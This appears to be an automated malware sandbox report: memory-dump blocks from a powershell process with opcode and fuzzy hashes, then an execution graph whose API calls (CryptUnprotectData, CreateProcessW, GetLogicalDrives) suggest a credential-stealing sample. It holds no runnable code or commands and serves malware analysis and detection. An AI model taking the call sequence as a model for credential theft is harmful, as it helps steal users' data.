                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0ffba64a6812ddf9b9d6fbb613587a709d8bd4c61b3c3ccd727e64fce1e4f933
                                                                                                        • Instruction ID: 357d3b507332fd0743374db5ee08fd83d843dec050bb506bca47f3cbdc35876c
                                                                                                        • Opcode Fuzzy Hash: 0ffba64a6812ddf9b9d6fbb613587a709d8bd4c61b3c3ccd727e64fce1e4f933
                                                                                                        • Instruction Fuzzy Hash: 00418B71E15B548FE759CF678C4169AFBF3AFCA200F19C1FA84489A265EB340946CF11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a49d0d7eace574d92f099c76648fadb894672d82cbc73500bfb8d369d0380ad3
                                                                                                        • Instruction ID: 0a18e33e6ad11e2e6c14a255368e3539fb4c5f4e54a3d9b7988ca9f2b7d944fc
                                                                                                        • Opcode Fuzzy Hash: a49d0d7eace574d92f099c76648fadb894672d82cbc73500bfb8d369d0380ad3
                                                                                                        • Instruction Fuzzy Hash: 684174B1E156188FEB18CF6B8D4478AFAF7AFC9301F14D1B9844CAA255DB705582CF01
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9f9dfd5995b6672853642576e1184cd314e8ff7ae6ef5b86138d185b671c8754
                                                                                                        • Instruction ID: 34403153aecb3c76d082eb99e264dafb67c51dda661c43d4d26174fb80934713
                                                                                                        • Opcode Fuzzy Hash: 9f9dfd5995b6672853642576e1184cd314e8ff7ae6ef5b86138d185b671c8754
                                                                                                        • Instruction Fuzzy Hash: 0B31ED71D157548FEB5ACF2B98506DAFFF7AFCA200F08D0EAD448AA255DA300A85CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f59d9f4ccc5b4b46793976f1c186d84013837f90b88ef6ab3f5813b4d068431f
                                                                                                        • Instruction ID: 15e603b31a3f045015b6289b8238cfad40350c4b303eb0b46b985150f615ad53
                                                                                                        • Opcode Fuzzy Hash: f59d9f4ccc5b4b46793976f1c186d84013837f90b88ef6ab3f5813b4d068431f
                                                                                                        • Instruction Fuzzy Hash: 8641B2B0E05218CBEB58CF9AD844B9DBBF6BF89300F04C1AAD449AB394DB745985CF41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d5e61bea39d6e4566349e6a37a1dcab8922a1f0643e1436630f5190ca79d120a
                                                                                                        • Instruction ID: 77a570245228d23de70de7ded1aab09568c8288661a0abf61c4698cd5ce2e374
                                                                                                        • Opcode Fuzzy Hash: d5e61bea39d6e4566349e6a37a1dcab8922a1f0643e1436630f5190ca79d120a
                                                                                                        • Instruction Fuzzy Hash: 22318B71D156188FEB59CF5BD85069AF6FBAFC9300F04D0EA9408A6254DB701B81CF51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f80b6ba7be80186f1811bf75eecdd6fbc86a72c00b04a5e74b7a4f5f746f1863
                                                                                                        • Instruction ID: b71ef46d520b7dd88dbadcc926c54f3d0a0a7ecb0ae1bf48f267aa5943a561e9
                                                                                                        • Opcode Fuzzy Hash: f80b6ba7be80186f1811bf75eecdd6fbc86a72c00b04a5e74b7a4f5f746f1863
                                                                                                        • Instruction Fuzzy Hash: E2310871D05218CFEB58DF6AC9447DAFBB2AF89300F40D1EA8809AB355DB345989CF41
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8b6d5cfefe384f2704e9502bfbdd30fe7aba7e0aff0f1723514c53850d82b8d4
                                                                                                        • Instruction ID: b194208763937cd12075bf5f5fcb3d84b5eef61f547623c337545228cffd6ac3
                                                                                                        • Opcode Fuzzy Hash: 8b6d5cfefe384f2704e9502bfbdd30fe7aba7e0aff0f1723514c53850d82b8d4
                                                                                                        • Instruction Fuzzy Hash: BA318AB1D056188BEB58CF6BC94578DFBF6AFC9304F14C1AA840CA6264DF741A858F51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fc46b561ed64a5e14f534517be444c519625b030a5fa57e5a6e722d02e5b5622
                                                                                                        • Instruction ID: d47da41099e845e3b60c437e767eb49fe3d8aa7e0b134a42979c108fb0eddf0a
                                                                                                        • Opcode Fuzzy Hash: fc46b561ed64a5e14f534517be444c519625b030a5fa57e5a6e722d02e5b5622
                                                                                                        • Instruction Fuzzy Hash: 1821E8B1D056188BEB18CFABD9443DDFBF7AF88300F04C17AD408A6254DB7509858F40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bb493933d1087c6467f240a4f30b633ef37a67f14122eed1dd29ca58268c25a9
                                                                                                        • Instruction ID: 6540703bf757bad740d934beb02d023986846f3e88f60355e7a6ec14dac5f2cb
                                                                                                        • Opcode Fuzzy Hash: bb493933d1087c6467f240a4f30b633ef37a67f14122eed1dd29ca58268c25a9
                                                                                                        • Instruction Fuzzy Hash: 6D2158B1D016588BEB58CF6BC94979AFBF3AFC9304F14C1AAC44CA6264DF7409868F01
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$tPsq$tPsq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-927563862
                                                                                                        • Opcode ID: 5a3106b71dc37085d3ea09c6872c6bc3d550c19c8b8d3ef3ffd15ca58fe8c2ac
                                                                                                        • Instruction ID: 560acb01c6623e4bc9f81cf96e8b2c55f4ac6146d01917ea0c2bfa4d7a1cc154
                                                                                                        • Opcode Fuzzy Hash: 5a3106b71dc37085d3ea09c6872c6bc3d550c19c8b8d3ef3ffd15ca58fe8c2ac
                                                                                                        • Instruction Fuzzy Hash: 93D107B1B0424AFFDB168E69D8446FEBBA1BF85310F14847BD9058B281DB35EC41C7A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$4'sq$4'sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-1847884874
                                                                                                        • Opcode ID: 2fc27d455a13dfe8c8d5c4de979896b9deca36b7ea765ca6a1ec606375ae8517
                                                                                                        • Instruction ID: a0eb854eee6da4a81a725de30a2a6339b37d3a6b8d2310e189b01d9df0a99e1d
                                                                                                        • Opcode Fuzzy Hash: 2fc27d455a13dfe8c8d5c4de979896b9deca36b7ea765ca6a1ec606375ae8517
                                                                                                        • Instruction Fuzzy Hash: B281F6B1B0822AAFCB149B69D4546EEFBE1BFD5210F14847BD505CB242DB31E885CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$4'sq$4'sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-1847884874
                                                                                                        • Opcode ID: b61b10030e2035dc5eb2e67ed0180c8229366c8bf0b41ea08e65081612091b3c
                                                                                                        • Instruction ID: 4b307295faf2e3335e5f586ad92142875db737907cc4e120ac99241496a65d57
                                                                                                        • Opcode Fuzzy Hash: b61b10030e2035dc5eb2e67ed0180c8229366c8bf0b41ea08e65081612091b3c
                                                                                                        • Instruction Fuzzy Hash: A37115B1B18217AFCB258A7998402EEB7E1BFC5220F24C47BC556CB241DF32D842C791
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$tPsq$$sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-857588439
                                                                                                        • Opcode ID: 4fc7158a9069096db7b8687b3fe09fb2f414d6686d4f83d2160243f8fcd01e3b
                                                                                                        • Instruction ID: 589bb4a7b53b8f497ab2ba01204e9c432d38575fbcbd3129747ced554e01f5a5
                                                                                                        • Opcode Fuzzy Hash: 4fc7158a9069096db7b8687b3fe09fb2f414d6686d4f83d2160243f8fcd01e3b
                                                                                                        • Instruction Fuzzy Hash: 8B517FB0A1420AFFDF248E18C544BEEBBA2BB8D211F598CB7D8055B291D771DD40CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (wq$4'sq$4'sq$4'sq$4'sq$pwq
                                                                                                        • API String ID: 0-1920987972
                                                                                                        • Opcode ID: a8f6406195b338817f9a1b19e62d8f4281fa15a4a5738c55840e50542e73155e
                                                                                                        • Instruction ID: 674ba3bfc1257dae9a5d433720fef2fdda19c4566f5ea87468c9ee02aace270e
                                                                                                        • Opcode Fuzzy Hash: a8f6406195b338817f9a1b19e62d8f4281fa15a4a5738c55840e50542e73155e
                                                                                                        • Instruction Fuzzy Hash: F1D13C76A00114DFDB45DFA8C844D9ABBB2FF89310B0544E8E609AB272DB31ED55DF90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (osq$(osq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-838265113
                                                                                                        • Opcode ID: 279b13660374b61f275baeabb67ec09873788bd3b30fbf9440e7989aa91e2a46
                                                                                                        • Instruction ID: 706bd4026c89bf86e02c478383ab6f0b2a14f4ae1e166836e8f353a23ec712cf
                                                                                                        • Opcode Fuzzy Hash: 279b13660374b61f275baeabb67ec09873788bd3b30fbf9440e7989aa91e2a46
                                                                                                        • Instruction Fuzzy Hash: B7C1E6B1B0430AAFDB269E69D8407EEBBA2BF85310F14847BD5059B281DF35F851C7A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-737313894
                                                                                                        • Opcode ID: 5e0bd44275c0d9950bc3e2038089410e44e86747d87c92e27187883cdd87429e
                                                                                                        • Instruction ID: c0199cc3186b0b6b695bf1247cbbfafd34912f82c36153bd5c3537420365bd78
                                                                                                        • Opcode Fuzzy Hash: 5e0bd44275c0d9950bc3e2038089410e44e86747d87c92e27187883cdd87429e
                                                                                                        • Instruction Fuzzy Hash: AFC123B1B0421AAFDB149A6998406EEBBE2BFC5310F14847BD905CB2C1EF71D981C7E1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-1756373418
                                                                                                        • Opcode ID: c1cc5807e2c8d445081e58a1a22f6eca30b2c5c27642abbb65b8ae68f4161811
                                                                                                        • Instruction ID: b6982d84d1c85125bc81e60a17921696762df6185da7d396dea243f1b3bb0db3
                                                                                                        • Opcode Fuzzy Hash: c1cc5807e2c8d445081e58a1a22f6eca30b2c5c27642abbb65b8ae68f4161811
                                                                                                        • Instruction Fuzzy Hash: 67519BB060424AFFDB268E18D5446FE7BA1FF42351F488976E8158B191D335F990CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-1756373418
                                                                                                        • Opcode ID: 4c4371c9aabe6b28b70af0656ecefd077074fa676ee794761b1d9cea5cf54a1f
                                                                                                        • Instruction ID: 35c049db604a3340b3d7bb4156e5fd24aaf31ccacf4285f99f776ffb2a954c97
                                                                                                        • Opcode Fuzzy Hash: 4c4371c9aabe6b28b70af0656ecefd077074fa676ee794761b1d9cea5cf54a1f
                                                                                                        • Instruction Fuzzy Hash: 1A4169B061420AFFDB248E14C5447EE77E1FF8A251F548D77E8148B291D736D980CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$$sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-1756373418
                                                                                                        • Opcode ID: 31bfb18e333721ed82a3d226f52059d10b61d3b2ef01b3f2f42a906b9497eb09
                                                                                                        • Instruction ID: 3d2dd72c2d266281b8c7f693c9466ea39e11bde5a4a14067285b544a2ea5d64c
                                                                                                        • Opcode Fuzzy Hash: 31bfb18e333721ed82a3d226f52059d10b61d3b2ef01b3f2f42a906b9497eb09
                                                                                                        • Instruction Fuzzy Hash: 98317AF0A04206FFDB258E25CA40BEEB7E5BB81250F56C07BE5098B251DB35D984CBD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856705849.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (wq$(wq$Hwq$Hwq
                                                                                                        • API String ID: 0-1295389596
                                                                                                        • Opcode ID: 64452096b04e40ace139e184e130eeae8fab208a8fe9c42e039694e81a25f0e7
                                                                                                        • Instruction ID: f0088018afbf89d6d6794bf859e1acbc61ffb95cc2ecdbfcf3119fb7ed6bd097
                                                                                                        • Opcode Fuzzy Hash: 64452096b04e40ace139e184e130eeae8fab208a8fe9c42e039694e81a25f0e7
                                                                                                        • Instruction Fuzzy Hash: 6EE1D030B042559FCB49EF28C490AAEBBA2FF85310F1585A9E8059F395DB34ED46CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (osq$(osq$4'sq$tPsq
                                                                                                        • API String ID: 0-1599087423
                                                                                                        • Opcode ID: e94cae02886103b4c69497fb0ece04c428911f32578f5520aba13c8b9d0bbf88
                                                                                                        • Instruction ID: 6573a79cefe7ec860917103e88c92c675110f72facbde9f0c732c5e2cc14b86d
                                                                                                        • Opcode Fuzzy Hash: e94cae02886103b4c69497fb0ece04c428911f32578f5520aba13c8b9d0bbf88
                                                                                                        • Instruction Fuzzy Hash: 894125B1A04205EFCB208B588843BAEBBA2BFC5720F19C4BBD5149F242D731DC41C7A2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (osq$(osq$tPsq$$sq
                                                                                                        • API String ID: 0-2070755728
                                                                                                        • Opcode ID: 0845fc1a4d3675b5c326b198202dea192d92c45b959dd7299023c1ebf07b30e9
                                                                                                        • Instruction ID: d08db3668b0ab99611ee56e07b1653e52151408e976d862d0a971b972e633cb3
                                                                                                        • Opcode Fuzzy Hash: 0845fc1a4d3675b5c326b198202dea192d92c45b959dd7299023c1ebf07b30e9
                                                                                                        • Instruction Fuzzy Hash: E74136B1A04246AFDB248B588840BAEBBE1FFC9310F55887BE9049B242DB71DD45C7A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $sq$$sq$$sq$$sq
                                                                                                        • API String ID: 0-2855845837
                                                                                                        • Opcode ID: 0fce56849d6f17bfe59d3e96dec199001a401eb6e1e4942c5e763096d345a396
                                                                                                        • Instruction ID: 9b22e9f5df41a87fe8b634e64180c303c02dacfb37f91805fd40f008a974de47
                                                                                                        • Opcode Fuzzy Hash: 0fce56849d6f17bfe59d3e96dec199001a401eb6e1e4942c5e763096d345a396
                                                                                                        • Instruction Fuzzy Hash: 6E2137F17103467BDF349979A840B6FBA9AAFC8315F60843BA506CB2C2CD35CA418761
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq$$sq$$sq
                                                                                                        • API String ID: 0-148891389
                                                                                                        • Opcode ID: 649c2a1ffc0fcdb3b6e02f24ec85f7b18df16c9fde9cf59765b1ca7af9e885d2
                                                                                                        • Instruction ID: 442db11a2d4f11b0fde2acc7aa8f1d9168a9dd9b3f926af6f57ab757d4de4b40
                                                                                                        • Opcode Fuzzy Hash: 649c2a1ffc0fcdb3b6e02f24ec85f7b18df16c9fde9cf59765b1ca7af9e885d2
                                                                                                        • Instruction Fuzzy Hash: 1B01F761A1D3C96FC71702281820169BF726FC352075941E7C145DF2D7DD148C4683E7

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:9.7%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:35.1%
                                                                                                        Total number of Nodes:339
                                                                                                        Total number of Limit Nodes:20
                                                                                                        execution_graph 13777 418c40 13777->13777 13779 418a6f 13777->13779 13778 418c09 CryptUnprotectData 13778->13779 13779->13778 13911 40e002 13912 40e008 13911->13912 13915 4118d0 13912->13915 13914 40e011 13925 4118e9 13915->13925 13916 4118f0 13916->13914 13918 4085b0 ExitProcess 13918->13925 13919 411fa0 RtlExpandEnvironmentStrings 13919->13925 13920 41361e CreateProcessW 13920->13925 13921 41221b RtlExpandEnvironmentStrings 13921->13925 13924 43c1e0 RtlFreeHeap 13924->13925 13925->13916 13925->13918 13925->13919 13925->13920 13925->13921 13925->13924 13926 43e0f0 LdrInitializeThunk 13925->13926 13927 40ad20 13925->13927 13931 440ef0 13925->13931 13935 441800 13925->13935 13926->13925 13929 40adb0 13927->13929 13928 40add5 13928->13925 13929->13928 13941 43e060 13929->13941 13933 440f10 13931->13933 13932 44108e 13932->13925 13933->13932 13956 43e0f0 LdrInitializeThunk 13933->13956 13937 441820 13935->13937 13936 4419ae 13936->13925 13939 4418bf 13937->13939 13957 43e0f0 LdrInitializeThunk 13937->13957 13939->13936 13958 43e0f0 LdrInitializeThunk 13939->13958 13942 43e086 13941->13942 13943 43e078 13941->13943 13944 43e09f RtlReAllocateHeap 13941->13944 13948 43e0c7 13941->13948 13950 43e098 13941->13950 13951 43e0b1 13941->13951 13952 43c1e0 13942->13952 13943->13942 13943->13944 13943->13951 13944->13950 13945 43c1c0 RtlAllocateHeap 13945->13948 13946 43c1c0 RtlAllocateHeap 13949 43e0d0 13946->13949 13948->13946 13950->13929 13951->13945 13953 43c1f3 13952->13953 13954 43c204 13952->13954 13955 43c1f8 RtlFreeHeap 13953->13955 13954->13950 13955->13954 13956->13932 13957->13939 13958->13936 13780 40d643 13786 4095a0 13780->13786 13782 40d64a CoUninitialize 13783 40d670 13782->13783 13784 40dace CoUninitialize 13783->13784 13785 40daf0 13784->13785 13787 4095b4 13786->13787 13787->13782 13787->13787 13788 4367c7 13789 4367cc 13788->13789 13790 4367ee GetUserDefaultUILanguage 13789->13790 13791 43680f 13790->13791 13959 40cf05 13960 40cf60 13959->13960 13960->13960 13962 43e0f0 LdrInitializeThunk 13960->13962 13962->13960 13792 40c846 CoInitializeEx CoInitializeEx 13794 4085d0 13795 4085df 13794->13795 13796 408998 ExitProcess 13795->13796 13797 408981 13795->13797 13798 4085f4 GetCurrentProcessId GetCurrentThreadId 13795->13798 13814 43e040 13797->13814 13799 408633 SHGetSpecialFolderPathW 13798->13799 13800 40862d 13798->13800 13801 4087c0 13799->13801 13800->13799 13801->13801 13808 43c1c0 13801->13808 13804 408819 GetForegroundWindow 13806 408895 13804->13806 13806->13797 13811 40b3b0 FreeLibrary 13806->13811 13817 43f530 13808->13817 13810 43c1ca RtlAllocateHeap 13810->13804 13812 40b3cc 13811->13812 13813 40b3d1 FreeLibrary 13812->13813 13813->13797 13819 43f510 13814->13819 13816 43e045 FreeLibrary 13816->13796 13818 43f540 13817->13818 13818->13810 13818->13818 13820 43f519 13819->13820 13820->13816 13963 420012 13964 420030 13963->13964 13968 4412e0 13964->13968 13966 42012f 13967 4412e0 LdrInitializeThunk 13966->13967 13967->13966 13969 441300 13968->13969 13969->13969 13970 44149e 13969->13970 13972 43e0f0 LdrInitializeThunk 13969->13972 13970->13966 13972->13970 13821 43e1d2 13822 43e1e0 13821->13822 13822->13822 13823 43e275 GetForegroundWindow 13822->13823 13824 43e283 13823->13824 13978 40a491 13979 40a4b3 13978->13979 13982 40a870 13979->13982 13983 40a8b0 13982->13983 13984 43c1e0 RtlFreeHeap 13983->13984 13985 40a4bc 13983->13985 13984->13985 13986 43c210 13987 43c230 13986->13987 13989 43c28e 13987->13989 13996 43e0f0 LdrInitializeThunk 13987->13996 13988 43c451 13989->13988 13991 43c1c0 RtlAllocateHeap 13989->13991 13993 43c2fa 13991->13993 13992 43c1e0 RtlFreeHeap 13992->13988 13995 43c36e 13993->13995 13997 43e0f0 LdrInitializeThunk 13993->13997 13995->13992 13996->13989 13997->13995 13998 43041b CoSetProxyBlanket 13999 40d39c 14000 40d3b0 13999->14000 14005 40d42e 14000->14005 14077 43e0f0 LdrInitializeThunk 14000->14077 14001 40d4ee 14002 408b60 ExitProcess 14001->14002 14004 40d521 14002->14004 14033 422870 14004->14033 14005->14001 14078 43e0f0 LdrInitializeThunk 14005->14078 14008 40d527 14009 408b60 ExitProcess 14008->14009 14010 40d53d 14009->14010 14044 422f30 14010->14044 14012 40d543 14013 408b60 ExitProcess 14012->14013 14014 40d559 14013->14014 14051 4231e0 14014->14051 14016 40d55f 14017 408b60 ExitProcess 14016->14017 14018 40d575 14017->14018 14058 426210 14018->14058 14022 40d58d 14073 429750 14022->14073 14024 40d596 14025 408b60 ExitProcess 14024->14025 14026 40d5ac 14025->14026 14027 428150 RtlExpandEnvironmentStrings 14026->14027 14028 40d5b2 14027->14028 14029 408b60 ExitProcess 14028->14029 14030 40d5c8 14029->14030 14031 433510 6 API calls 14030->14031 14032 40d5d7 14031->14032 14034 4228c0 14033->14034 14034->14034 14035 42293e RtlExpandEnvironmentStrings 14034->14035 14036 422980 14035->14036 14037 422b01 14036->14037 14038 4229ef 14036->14038 14039 4229d0 RtlExpandEnvironmentStrings 14036->14039 14040 422a0d 14036->14040 14037->14038 14041 422c81 GetLogicalDrives 14037->14041 14038->14008 14039->14037 14039->14038 14039->14040 14042 4412e0 LdrInitializeThunk 14040->14042 14043 4412e0 LdrInitializeThunk 14041->14043 14042->14037 14043->14038 14045 422fd0 14044->14045 14045->14045 14046 423031 RtlExpandEnvironmentStrings 14045->14046 14049 423080 14046->14049 14047 4402d0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14047->14049 14048 4230fc 14048->14012 14048->14048 14049->14047 14049->14048 14050 4230dd RtlExpandEnvironmentStrings 14049->14050 14050->14048 14050->14049 14052 4231ee 14051->14052 14079 43fe30 14052->14079 14054 4402d0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14056 4230c5 14054->14056 14055 4230fc 14055->14016 14055->14055 14056->14054 14056->14055 14057 4230dd RtlExpandEnvironmentStrings 14056->14057 14057->14055 14057->14056 14060 42624e 14058->14060 14061 42622e 14058->14061 14059 40d584 14068 426610 14059->14068 14060->14059 14062 43c1c0 RtlAllocateHeap 14060->14062 14061->14060 14084 43e0f0 LdrInitializeThunk 14061->14084 14065 4262f4 14062->14065 14064 43c1e0 RtlFreeHeap 14064->14059 14067 42632e 14065->14067 14085 43e0f0 LdrInitializeThunk 14065->14085 14067->14064 14086 426630 14068->14086 